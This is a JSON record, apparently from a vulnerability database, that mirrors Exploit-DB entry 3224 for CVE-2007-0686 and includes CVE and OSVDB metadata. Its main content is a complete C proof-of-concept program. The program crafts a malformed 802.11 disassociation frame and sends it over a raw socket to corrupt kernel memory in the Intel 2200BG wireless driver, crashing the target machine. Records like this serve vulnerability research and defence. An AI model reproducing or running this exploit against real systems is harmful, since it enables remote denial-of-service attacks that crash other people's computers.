{"bulletinFamily": "exploit", "id": "EDB-ID:3224", "cvelist": ["CVE-2007-0686"], "modified": "2007-01-29T00:00:00", "lastseen": "2016-01-31T18:00:20", "edition": 1, "sourceData": "/*\r\nTitle: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption\r\n\r\nDescription: The intel wireless mini-pci driver provided with Intel\r\n/*\r\nTitle: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption\r\n\r\nDescription: The intel wireless mini-pci driver provided with Intel\r\n2200BG cards is vulnerable to a remote memory corruption flaw.\r\nMalformed disassociation packets can be used to corrupt internal kernel\r\nstructures, causing a denial of service (BSOD)\r\n\r\nThis vulnerability was found at Intel 2200 driver version 9.0.3.9\r\n(09/12/2005).\r\n\r\nDriver files:\r\n\r\nw29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725\r\nw29mlres.dll 35afeccc4092b69f62d757c4707c74e9\r\nw29NCPA.dll 980f58b157baedc23026dd9302406bdd\r\n\r\nAuthor: Breno Silva Pinto ( Sekure.org ) / bsilva[at]sekure[dot]org)\r\n\r\n\r\nProof Of Concept:\r\n*/\r\n\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/ioctl.h>\r\n#include <asm/types.h>\r\n#include <linux/if.h>\r\n#include <linux/if_packet.h>\r\n#include <linux/if_ether.h>\r\n#include <linux/if_arp.h>\r\n#include <netinet/in.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n\r\n// 28 bytes disassociation packet.\r\n\r\nchar d[] = { 0xa0, 0x00, // 0xa0 pacote Disassociate 0xa000 FC Normal\r\n 0x00, 0x00, // Duration ID\r\n 0x00, 0x12, 0xf0, 0x29, 0x77, 0x00, // DST addr\r\n 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, // SRC addr\r\n 0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0, // BSS id\r\n 0x00, 0x00, // Frag. Number\r\n 0x01, 0x00, 0x00, 0x00 }; // 2 bytes - Reason code\r\n\r\nint main() {\r\n struct sockaddr_ll link;\r\n struct ifreq iface;\r\n int s;\r\n char packet[sizeof(d)];\r\n int len = 0;\r\n\r\n if((s=socket(PF_INET, SOCK_DGRAM, 0))<0)\r\n return 0;\r\n\r\n bzero(&iface,sizeof(iface));\r\n bzero(&link,sizeof(link));\r\n bzero(packet,sizeof(d));\r\n\r\n strcpy(iface.ifr_name,\"ath0raw\");\r\n\r\n if(ioctl(s,SIOCGIFHWADDR, &iface)) {\r\n return 0;\r\n }\r\n\r\n if(ioctl(s,SIOCGIFINDEX, &iface)) {\r\n return -1;\r\n }\r\n\r\n if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))<0) {\r\n return -1;\r\n }\r\n\r\n link.sll_family = AF_PACKET;\r\n link.sll_ifindex = iface.ifr_ifindex;\r\n\r\n if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) {\r\n return -1;\r\n }\r\n\r\n memcpy(packet,d,sizeof(d));\r\n len = sendto(s,packet,sizeof(d), 0, NULL, 0);\r\n usleep(5000);\r\n printf(\"%d bytes enviados\\n\",len);\r\n\r\n close(s);\r\n\r\n return 0;\r\n}\r\n\r\n// milw0rm.com [2007-01-29]\r\n", "published": "2007-01-29T00:00:00", "href": "https://www.exploit-db.com/exploits/3224/", "osvdbidlist": ["37996"], "reporter": "Breno Silva Pinto", "hash": "225a40c82f48600500a0a862f93ee319d2ecda44085543a9f1945446fb5b9b68", "title": "Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption. CVE-2007-0686. Dos exploit for windows platform", "references": [], "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3224/", "viewCount": 1, "enchantments": {"vulnersScore": 4.7}}

{"result": {"cve": [{"id": "CVE-2007-0686", "type": "cve", "title": "CVE-2007-0686", "description": "The Intel 2200BG 802.11 Wireless Mini-PCI driver 9.0.3.9 (w29n51.sys) allows remote attackers to cause a denial of service (system crash) via crafted disassociation packets, which triggers memory corruption of \"internal kernel structures,\" a different vulnerability than CVE-2006-6651. NOTE: this issue might overlap CVE-2006-3992.", "published": "2007-02-02T20:28:00", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0686", "cvelist": ["CVE-2007-0686"], "lastseen": "2016-09-03T08:23:33"}], "osvdb": [{"id": "OSVDB:37996", "type": "osvdb", "title": "Intel 2200BG 802.11 Wireless Mini-PCI (w29n51.sys) Crafted Disassociation Packets Remote DoS", "description": "# No description provided by the source\n\n## References:\nGeneric Exploit URL: http://milw0rm.com/exploits/3224\n[CVE-2007-0686](https://vulners.com/cve/CVE-2007-0686)\n", "published": "2007-01-29T16:02:52", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:37996", "cvelist": ["CVE-2007-0686"], "lastseen": "2017-04-28T13:20:34"}]}}